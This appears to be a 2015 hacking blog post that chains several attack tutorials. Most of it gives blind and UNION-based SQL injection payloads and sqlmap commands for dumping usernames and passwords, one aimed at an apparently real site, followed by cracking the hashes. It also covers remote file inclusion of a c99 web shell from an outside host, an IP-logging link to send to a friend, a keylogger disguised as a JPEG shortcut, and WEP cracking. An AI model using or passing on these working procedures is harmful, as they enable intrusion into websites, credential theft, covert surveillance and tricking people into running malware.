Friday, 7 August 2015

Blind SQLi Tutorial








what is Blind SQLi


Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established


Blind SQLi Tutorial




Let’s Start…………              



Suppose That You want to Hack This website with Blind SQLi

http://site.com/index.php?id=5

when we execute this, we see some page and articles on that page, pictures
etc…

then when we want to test it for blind sql injection attack

http://www.site.com/index.php?id=5 and 1=1 <--- this is always true
and the page loads normally, that's ok.
now the real test

http://www.site.com/index.php?id=5 and 1=2 <--- this is false
so if some text, picture or some content is missing on returned page then
that site is vulrnable to blind sql injection.

1) Get the MySQL version
to get the version in blind attack we use substring
i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=4
this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5.
i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=5
2) Test if subselect works
when select don't work then we use subselect
i.e
http://www.site.com/index.php?id=5 and (select 1)=1
if page loads normally then subselects work. then we gonna see if we have access to mysql.user
i.e
http://www.site.com/index.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can
pull some password usign load_file() function and OUTFILE.
3). Check table and column names
This is part when guessing is the best friend :) i.e.
http://www.site.com/index.php?id=5 and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, cause subselect
returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users
exits.
if you get FALSE (some article missing), just change table name until you
guess the right one :)
let's say that we have found that table name is users, now what we need is
column name.
the same as table name, we start guessing. Like i said before try the
common names for columns.
i.e
http://www.site.com/index.php?id=5 and (select substring(concat(1,
password),1,1) from users limit 0,1)=1
if the page loads normally we know that column name is password (if we get
false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first
character (,1,1)
4). Pull data from database
we found table users i columns username password so we gonna pull
characters from that.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii()
converts that 1 character into ascii value
and then compare it with simbol greater then > .
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>95
we get TRUE, keep incrementing
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
so the first character in username is char(99). Using the ascii converter
we know that char(99) is letter 'c'.
then let's check the second character.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),2,1))>99
Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it
returns the second character, 1 character in lenght)
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>107
FALSE, lower number.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>104
TRUE, higher.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>105
FALSE!!!
we know that the second character is char(105) and that is 'i'. We have
'ci' so far
so keep incrementing until you get the end. (when >0 returns false we know
that we have reach the end).
There are some tools for Blind SQL Injection, i think sqlmap is the best,
but i'm doing everything manually,
cause that makes you better SQL INJECTOR :D
Hope you learned something from this Tutorial.
Have FUN! :)

To be continued and updated…

SQL Injection Using SQL Map

 

What is SQLMAP?

sqlmap is an open source penetration testing tool that automates the process of detecting and
exploiting SQL injection flaws and taking over of database servers. It comes with a powerful
detection engine, many niche features for the ultimate penetration tester and a broad range of
switches lasting from database fingerprinting, over data fetching from the database, to accessing
the underlying file system and executing commands on the operating system via out-of-band
connections.

Things you require

1) BackTrack 5
2) A vulnerable website 
The vulnerable link i am going to use is
http://www.targetsite.com/item.php?id=200

Step by step Procedure to hack :

First open Backtrack5 and then open SQLMAP. You can open SQLMAP by doing the
following.
Applications-->backtrack-->Exploitation tools-->web exploitation tools-->sqlmap.
 
It opens your sqlmap console .
 Scanning the URL and finding out the database names
Now i am going to scan the url using the following command.
./sqlmap.py -u http://www.targetsite.com/item.php?id=200 –dbs
Here –u is for URL .
You can also scan the entire website by simply replacing the above URL with the website‟s
URL.
Now i am going to scan the link.
It has shown me a very good message that “GET parameter “id” is vulnerable”.
And asked me to continue or stop. As i have already got a vulnerable parameter, i have stopped
by pressing „N‟. You can continue the scan if you want.

Finding out table names

Great..!! We got the database names.

 Now we need to find out the table and column names.  
As information_schema is for metadata, i am going with the database “waterufo_net”.
 The following query gives me the table names.
 ./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --tables -D waterufo_net
 Here –D is to specify the name of the database.

 Finding out column names

Fine.. Now we got 6 tables. As we are always interested in usernames and passwords, lets
move on to the fl_users table and find the column names in that table.
 So we use the following query
./sqlmap.py -u http://www.targetsite.com/item.php?id=200 --columns -T fl_users -D
waterufo_net
 Here -T is for tablename.

 Retrieving Data

We got all the columns from the table fl_users. Now we have to retrieve the data from the
database. For that we need to write the following query. We are just adding –dump to the above
query.
 ./sqlmap.py -u http://www.targetsite.com/item.php?id=200 --columns -T fl_users -D
waterufo_net –dump
 We got all the data we want. I hope you know what to do now.

URL Based SQL Injection



Finding Sites: When talking to find a vulnerable site for SQL Injection you will hear the term Dork a lot, this refers to a google search term targeted at finding vulnerable websites. An example of a google dork is inurl:index.php?id=, entering this string in google search engine would return all sites from google cache
with the string news.php?id= in their URL.

Ex:
http://www.site.com/news.php?id=4
To be a SQL injection vulnerable a site has to have
a GET parameter in the URL.

In http://www.site.com/news.php?id=4, id=4 is the GET parameter
as it is getting the id=4 from the backend database.

Checking Vulnerability: To check if the site is vulnerable to SQLi the most common way is to just add an apostrophe( ‘ ) after one of the parameter in the URL.

Ex:
http://www.site.com/news.php?id=4′

Now if the site is vulnerable it will show error like:
You have an error in your SQL Syntax
Warning: mysql_num_rows()
Warning: mysql_fetch_assoc()
Warning: mysql_result()
Warning: mysql_fetch_array()
Warning: mysql_numrows()
Warning: mysql_preg_match()

If you see any of these errors when entering ‘ after the number or string of parameter then the chances are the site is vulnerable to SQLi attacks to some extent. Although that is not the only way to know if the site is vulnerable to SQLi attacks, an error can be in form of when a part of the site is just simply disappears such as a news article, body text or images. If this happens then the site is vulnerable also.

Finding number of columns: After you find that the site is vulnerable the next step is to find the number of columns in the table that is in use. There are couple of ways to do this like ORDER BY or GROUP BY. Here I will use ORDER BY To find the number of columns start with ORDER BY 1.

Ex.
http://www.site.com/news.php?id=4 ORDER BY 1–

If it doesn’t error then probably you can use ORDER BY command. Sometimes you will get error on doing ORDER BY 1, if it gives error then simple move on to other site.

If it doesn’t error then I always go to ORDER BY 10000 (because a table can’t have 10000 columns in it) to see if it give error.

Ex.
http://www.site.com/news.php?id=4 ORDER BY 10000–

Sometimes it doesn’t error as it should, then I use AND 1=0
before the ORDER BY query to get an error.

Ex.
http://www.site.com/news.php?id=4 AND 1=0 ORDER BY 10000–

After getting the error on 10000 its up to you how you find the number of columns, I start with 100 and divide the no of columns by 2 until i get closer. Something like this:

http://www.site.com/news.php?id=4 ORDER BY 100–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 50–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 25–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 12–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 6–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 3–
NO ERROR

As 6 is giving error and 3 is not the number of columns is either 3,
4 or 5.
http://www.site.com/news.php?id=4 ORDER BY 4–
NO ERROR
http://www.site.com/news.php?id=4 ORDER BY 5–
ERROR

After this you can conclude that the website has 4 columns as itgives error above ORDER BY 4 and doesn’t error below ORDER BY 4.

NOTE: Comments are not necessary every time when injecting a website, although sometimes they are. Possible comments to use are:–
/*
/**/
#

Getting MySQL version: This is an important step because if the MySQL version is lower than 5 then we have to guess the name of the tables and columns to inject which is sometimes get frustrating so I would recommend to work on version 5 for beginners. Before finding the version of the column we have to
find the visible column number to inject our query to get result.

To do this we will use the SELECT statement and UNION ALL statement.
 http://www.site.com/news.php?id=4 UNION ALL SELECT 1,2,3,4–

 It will return numbers back in data place, if it doesn’t then add a
negative sign after the equals sign, put a null in place of the
number after the equal sign or add AND 1=0 before
the UNION query.

 http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,3,4–

http://www.site.com/news.php?id=null UNION ALL SELECT 1,2,3,4–

http://www.site.com/news.php?id=4 AND 1=0 UNION ALL SELECT
1,2,3,4–



Now say we got back the number 3, so this is the column that we can retrieve data from. To get the database version there are two ways either version() or @@version, let’s use them:

http://www.site.com/news.php?id=-4 UNION ALL SELECT
1,2,group_concat(version()),4–
http://www.site.com/news.php?id=-4 UNION ALL SELECT
1,2,group_concat(@@version),4–

If you get an error like "Illegal mix of coallations when using @@version", then you have to convert it into latin from UTF8 as:

http://www.site.com/news.php?id=-4 UNION ALL SELECT
1,2,group_concat(@@version using latin1),4–

NOTE: We are completely replacing the number 3 with our query, Something like 1,2,group_concat(@@version),3,4– will result in error.

If it worked you will get the version of MySQL. You will see
something like 5.0.45, 5.0.13-log, 4.0.0.1 etc. All we need to focus
is on the first number,i.e., 4 or 5. If it is 5 then keep going but if it
is 4 and you are new then you should move on to other website
because we have to guess the table names in order to extract the
data.

NOTE: Sometime you will get frustrated by knowing that you spent 5-10 minutes in just getting the database version after applying the ORDER BY, UNION SELECT and version() in queries and the result is MySQL4. So to save my time in getting the database version, I use the Inferential(Blind SQL Injection) to get the version of the MySQL. Do as follows:

 http://www.site.com/news.php?id=4 AND 1=1–
NO ERROR
http://www.site.com/news.php?id=4 AND 1=2–
ERROR
http://www.site.com/news.php?id=4 AND
substring(@@version,1,1)=4–

 If page come back true then the version is 4.
http://www.site.com/news.php?id=4 AND substring(@@version,1,1)=5–

 If page come back true then the version is 5.

 If version is 5 then you can start ORDER BY and continue because you already know that the version is 5 and you will not have to guess the table names. Although I would recommend that
beginners should use ORDER BY.

GETTING NAME OF DATABASES: Getting databases name is very important because sometimes the current database the webpage is running does not contains useful informations such as username and passwords. So it is good to have a look at all the databases. In MySQL version 5 or higher there is always a
database named ‘information_schema’ which make SQL injection easier. To get the list of the databases use this:
http://www.site.com/news.php?id=-4 UNION ALL SELECT
1,2,group_concat(schema_name),4 from information_schema.schemata–

now you will get the name of all the databases at the same
position where you saw the version of MySQL before.

Ex: information_schema,db_site,db_main

To know which database you are working upon use database() in
the query as:
http://www.site.com/news.php?id=-4 UNION ALL SELECT
1,2,group_concat(database()),4–

Now you will get the current database.
 Ex: db_site

To know the current user of database use user(), although its not
necessary but its good to know.
 http://www.site.com/news.php?id=-4 UNION ALL SELECT
1,2,group_concat(user()),4–

 Now you should get the current user of database.
Ex: user@localhost.

To save your time you can use a query to display version, current
database and user all at once as:
http://www.site.com/news.php?id=-4 UNION ALL SELECT
1,2,group_concat(version(),0x3a,database(),0x3a,user()),4–
or
http://www.site.com/news.php?id=-4 UNION ALL SELECT
1,2,CONCAT_WS(CHAR(32,58,32),version(),database(),user()),4–

Getting Table Names: It is good habit to check the table name of all the databases because sometimes the current database does not contains useful information.

To get the table names of current database:
http://www.site.com/news.php?id=-4 UNION ALL SELECT
1,2,group_concat(table_name),4 from information_scheme.tables
where table_schema=database()–

Assume it gave you the following names of the tables contains in the current database
(in our example db_site).
Ex. News, Gallery, Games etc

As you can see it is not looks useful, so get the table names of other database(in our example db_main), but to do so you have to encode the name of the database in hexadecimal form and put ’0x’ in front of the encoded hexed name to tell the database that it is hex encoded and and it need to be decoded it to get the right name.
In our example we need to get the table name of database
‘db_main’ after encoding it to hex it is equivalent to
’64625f6d61696e’. To get the table names of the database
‘db_main’:
http://www.site.com/news.php?id=-4 UNION ALL SELECT
1,2,group_concat(table_name),4 from information_schema.tables
where table_schema=0x64625f6d61696e–

It will give you the name of all tables in the database ‘db_main’.
Ex: newsletters, posts, Administrator

Now we can see that this is a good stuff.

NOTE: Online Text to Hex
converter: http://www.swingnote.com/tools/texttohex.php

Getting Column Names: Now to extract data from table Administrator we need to find the columns in it. To get this you would do:
http://www.site.com/news.php?id=-4 UNION ALL SELECT
1,2,group_concat(column_name),4 from
information_schema.columns where
table_name=0x41646d696e6973747261746f72–

NOTE: We replace ‘information_schema.tables‘ with
information_schema.columns‘ and ‘table_schema‘ with
table_name‘. Again we encoded ‘Administrator‘ in Hex to get
our query work.

Now you should see the column names.
Ex: Id,Username,Password

Now to extract data from columns ‘Id,Username,Password‘ of
table ‘Administrator‘ of database ‘db_main‘, you would do:
http://www.site.com/news.php?id=-4 UNION ALL SELECT
1,2,group_concat(CONCAT_WS(CHAR(32,58,32),Id,Username,Password)) from db_main.Administrator–

Sometimes it will not work then you have to encode

db_main.Administrator‘ into hex:
http://www.site.com/news.php?id=-4 UNION ALL SELECT
1,2,group_concat(CONCAT_WS(CHAR(32,58,32),Id,Username,Password)) from 0x64625f6d61696e2e41646d696e6973747261746f72–

Now you will get what you were looking for ;)

SQL Injection (Manually)


 

 

Let‘s Start:

Log on to http://www.website.com/news/news.php?id=130.
Basically we are going to send the queries through URL to
get back results on screen accordingly. The motive is to
get name of table, name of colmun in which usernames and passwords are stored and finally
fetching them. Instead of copying and pasting the long links, 
simply click on "click here” and open in new tab.

Step 1: Checking Sql Vulnerability.
First we have to check that website is vulnerable to sql
attack or not.To Check SQL vulnerability add „ sign after
the URL
http://www.website.com/news/news.php?id=130′

Now it will return to some sql error like:
"You have an error in sql syntax.!$#^&((__+)()*&^%^in line 23"


Step2:Find number of columns.
Lets use "ORDER BY” clause here, it is used to sort the
columns.Choose any number,
say 10. Here I have assumed that number columns cant
be more then 10.”–” is used for making anything after it
comment.
Now go to site which is Vulnerable to SQL.
http://www.Website.com/news/news.php?id=130 order by 10–

Actually we instructed it sort the result by 10th column. But
it returned us with an error,this means number of columns
are less then 10. Lets replace it with 9.
http://www.website.com/news/news.php?id=130 order by 9.

But again we got an error.
This means number of columns are less than 9. Like this we
keep on moving, until we don‟t get any error.

Finally we reach on ‟6′
http://www.website.com/news/news.php?id=130 order by 6–

we didn‟t get any error, this means there are 6 columns.


Step 3:Find vulnerable columns.
Now lets use "UNION ALL” and "SELECT” command.
Remember to put dash (-) before 130.
http://www.website.com/news/news.php?id=-130 union select
all 1,2,3,4,5,6–.


We would get a couple of numbers on screen. The bold
ones are the most vulnerable columns.
In this case the most vulnerable is number 2.




Step 4: Find database version.
Replace the most vulnerable column with "@@version” or
"verson()” (if first one doesn‟t work).
http://www.website.com/news/news.php?id=-130 union select
all 1,@@version,3,4,5,6–

We got the version on screen.
The only thing to noteis that version is 5 point something that
is greater than 5.
 We would have followed some otherapproach in case the version would be
less than 5 because there is no database by default like
"information_schema” which stores information about
tables/columns of other databases. in version less than 5.





Step 5: Finding table names.
Replace vulnerable column no. with "table_name”.
http://www.website.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()–

We got first table name on the screen.





To get all tables use group_concat
http://www.website.com/news/news.php?id=-130 union
select all 1,group_concat(table_name),3,4,5,6 from
information_schema.tables where
table_schema=database()–


 
step 6:Finding column names.
Similar get all the columns by simply replacing „table‟ with
„column‟
http://www.website.com/news/news.php?id=-130 union select
all 1,group_concat(column_name),3,4,5,6 from_information_schema.columns where table_schema=database()–


There is a repeating element like in this case is „id‟ .From
it, we come to know which table number has which
columns.


Step 7:Fetching data from columns.
We can fetch the data stored in any column. But the
interesting ones here are username and password.
These columns are in first table that is tar_admin. "0x3a” is
used simply to insert a colon in result to separate it, it is
hex of colon.




http://www.website.com/news/news.php?id=-130 union select
all 1,group_concat(username,0x3a,password),3,4,5,6 from
tar_admin–
.

 So finally we got the usernames and passwords on
screen. But passwords are encrypted.

Mostly these encryptions are crackable. Lets choose any
username say "Sneds”.

The password in encrypted form is
7d372d3f4ad3116c9e455b20e946dd15 .

Lets logon
to http://md5crack.com/crackmd5.php or http://www.md5decrypter.co.uk
and put the hashed(encrypted) password here.

And it would crack for us. We got „oorwullie‟ in result (
password in clear text).

Note: Hashes are type of encryptions which are irreversible.
There are numberless online crackers available. Keep trying.
Sometimes very strong hashes can not be cracked.

Login page of website:
So you got the key, where is lock now ? Most of the
websites have login pages at default locations.
There is any website, say www.xyz.com. The login page
would be at
www.xyz.com/admin , www.xyz.com/administrator ,
www.xyz.com/adminlogin etc.

SQL Injection (Basics)

What is SQL Injection?

 Basically SQL Injections or simply called Structured Query
Language Injection is a technique that exploits the loop hole in
the database layer of the application. This happens when user
mistakenly or purposely(hackers) enters the special escape
characters into the username password authentication form or in
URL of the website. Its basically the coding standard loop hole.
Most website owners doesn't have proper knowledge of secure
coding standards and that results into the vulnerable websites.
For better understanding, suppose you opened a website and went
to his Sign in or log in page. Now in username field you have
entered something say LOKESH and in the password box you
pass some escape characters like ',",1=1, etc... Now if the website
owner hasn't handled null character strings or escape characters
then user will surely get something else that owner never want
their users to view.. This is basically called Blind SQL.

Requirements for SQL Injection:

1. You need a web browser to open URL and viewing source codes.
2. Need a good editor like Notepad ++ to view the source codes in
colored format so that you can easily distinguish between the
things.
3. And very basic knowledge of some SQL queries like SELECT,
INSERT, UPDATE, DELETE etc..

What you should look into website to detect

is it vulnerable to SQL injection attack or not?

First of all you can hack those websites using SQL injection hacks
that allows some input fields from which can provide input to
website like log in page, search page, feedback page etc.
Nowadays, HTML pages use POST command to send parameters
to another ASP/ASPX page. Therefore, you may not see the
parameters in the URL. 
However, you can check the source codeof the HTML, and look for
 "FORM" tag in the HTML code. 
You may find something like this in some HTML codes:
< F O R M action=login. aspx method=post>
< i n p u t type=hidden name=user v a l u e=xyz>
< / F O R M>
Everything between the < f o r m > and < / f o r m > parameters
(remove spaces in words) contains the crucial information and
can help us to determine things in more detailed way.
There is alternate method for finding vulnerable website,
the websites which have extension ASP, ASPX, JSP, CGI or PHP
try to look for the URL's in which parameters are passed. Example
is shown below: 
http://example.com/login.asp?id=10
Now how to detect that this URL is vulnerable or not:
Start with single quote trick, take sample parameter as hi'or1=1--.
Now in the above URL id is the parameter and 10 is its value. So
when we pass hi'or1=1-- as parameter the URL will look like this:
http://example.com/login.asp?id=hi' or 1=1--
You can also do this with hidden field, for that you need to save
the webpage and had to made changes to URL and parameters
field and modify it accordingly. For example:
< F O R M action=http://example.com/login. asp
method=p o s t >
< i n p u t type=hidden name=abc value="hi' or 1=1--">
< / F O R M >

If your luck is favoring you, you will get the login into the website
without any username or password.
But why ' or 1=1-- ?
Take an asp page that will link you to another page with the
following URL: 
http://example.com/search.asp?category=sports
In this URL 'category' is the variable name and 'sports' is it's
value. Here this request fires following query on the database in
background. SELECT * FROM TABLE-NAME WHERE category='sports'
Where 'TABLE-NAME' is the name of table which is already
present in some database.
So, this query returns all the possible entries from table 'search'
which comes under the category 'sports'.
Now, assume that we change the URL into something like this:
http://example.com/search.asp?category=sports' or 1=1--
Now, our variable 'category' equals to "sports' or 1=1-- ", which
fires SQL query on database something like:
SELECT * FROM search WHERE category='sports' or
1=1--'
The query should now select everything from the 'search' table
regardless if category is equal to 'sports' or not.
A double dash "--" tell MS SQL server to ignore the rest of the
query, which will get rid of the last hanging single quote (').
Sometimes, it may be possible to replace double dash with single
hash "#".
However, if it is not an SQL server, or you simply cannot ignore
the rest of the query, you also may try
' or 'a'='a
It should return the same result.
Depending on the actual SQL query, you may have to try some of
these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
'or''=' 
How to protect you own websites from
SQL injection?
Filter out character like ' " - / \ ; NULL, etc. in all
strings from:
* Input from users
* Parameters from URL
* Values from cookie

How To Hack Websites Using RFI (Remote File Inclusion)


 

Note : Only For Educational Purpose.>!!! 


Lets Start

1st Find a Vunerable websites using Google Dork
''inurl:index.php?page='' its Most Popular Dork of RFI hacking

This will show all the pages which has ''index.php?page='' in their URL,

Now to test whether the website is vulnerable to Remote file Inclusion
or
not the hacker use the following command www.targetsite.com/index.php?page=www.google.com 

 So the hacker url will become http://www.targetsite.com/v2/index.php?page=http://www.google.com
If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up

then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell.

You can download c99 shell from the link below:
http://www.sh3ll.org/c99.zip

The hacker would first upload the shells to a webhosting site such as ripway.com, viralhosts.com,110mb.com or another free hosts etc.

Now here is how a hacker would execute the shells to gain access.

Lets say that the url of the shell is http://www.sh3ll.org/c99.txt?

Now here is how a hacker would execute the following command to gain access http://www.targetsite.com/v2/index.php?page=http://www.sh3ll.org/c99.t xt?

Don't Forget To add ―?‖ after .txt at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it he can upload deface pages... etc to pwned the site

How To Hack An IP Address Of A Remote PC

What can you do with an IP address?
Well you can hack a computer using it's IP address.
You can find the location of the computer using its IP address.

Things required:
1) PHP script to catch the IP.
2) .txt file to store the IP.
you can download them from here.

Procedure:

Step 1: First create an account in any free webhosting site.
examples are
www.110mb.com
www.drivehq.com
www.t35.com
www.my3gb.com

Step 2: Extract the IP finder script you have downloaded.

Step 3: Now Upload the files onto the free web hosting site.

Step 4:Give the link of ip.php script to your friend.
When he clicks the link, his IP address will be strored in the ip_log.txt file.

Hide keyloggers in a .jpg file

 
Through this trick you can easily hide keyloggers. First download any key logger from google i think Ardamax is best. After installing just follow these easy steps=>

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked. Basically what you need is to see hidden files and see the extension of all your files on your pc. 

2) Paste a copy of your server on the new created folder. Let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it) 

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg' 

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.
 


6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'. 

7) Go to properties (on file me.jpeg) and now you need to do some changes there. 

8) First of all delete all the text on field 'Start In' and leave it empty. 

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :- 'C:\WINDOWS\system32\cmd.exe / c picture.jpeg' 

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS \system32\cmd.exe /c soccer.avi'. 

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run. 

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :- %SystemRoot% \system32\SHELL32.dll . 
Then press OK. 

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone. 

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. 
So rename the files to whatever you want considering the person and the knowledge they have on this matter. 

15) For me for example I always want the shortcut showing first so can be the first file to be opened. 
So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'. This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file. 

16) So the best way to send these files together to someone is compress them into Zip or Rar. 

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

How To Hack Wi-Fi using Backtrack

1: A Computer.
2: A Wireless Card capable of packet injection.
3: A Live installation of BackTrack either on a CD or USB stick.
BackTrack Can be found here
Create a Live USB Install here


Steps:-

1. Boot into BackTrack

2. Click on the Backtrack applications menu -> Backtrack -> Exploitation tools ->
Wireless exploitation -> WLAN Exploitation -> gerix-wifi-cracker-ng (This will open
up the GUI interface seen in the picture).

3. Go to the configuration menu and select the wireless interface wlan0
-Click on Enable/Disable Monitor Mode (this will put the wireless card into
monitor mode)
-Select the newly created mon0 interface.

4. Now click on the WEP tab at the top of the window. -Click on "Start sniffing
and logging" and leave the terminal open. -Once the wireless network you want
to crack* shows up (it has to be WEP encryption of course) select the WEP Attacks
(with clients). *note that the PWR has to be high enough to work so the closer
you can get, the better. -There you click on “Associate with AP using fake auth”,
wait a few seconds and click on “ARP request replay”.

5. Once the Data number reaches over 10,000 you are ready to try (if the data is
coming fast wait until 20 or 30,000 to be safe) and crack the key, but don't close
any windows yet. -Go to the cracking tab and click on “Aircrack-ng – Decrypt WEP
password” under Wep Cracking.

Within a few minutes password will be cracked.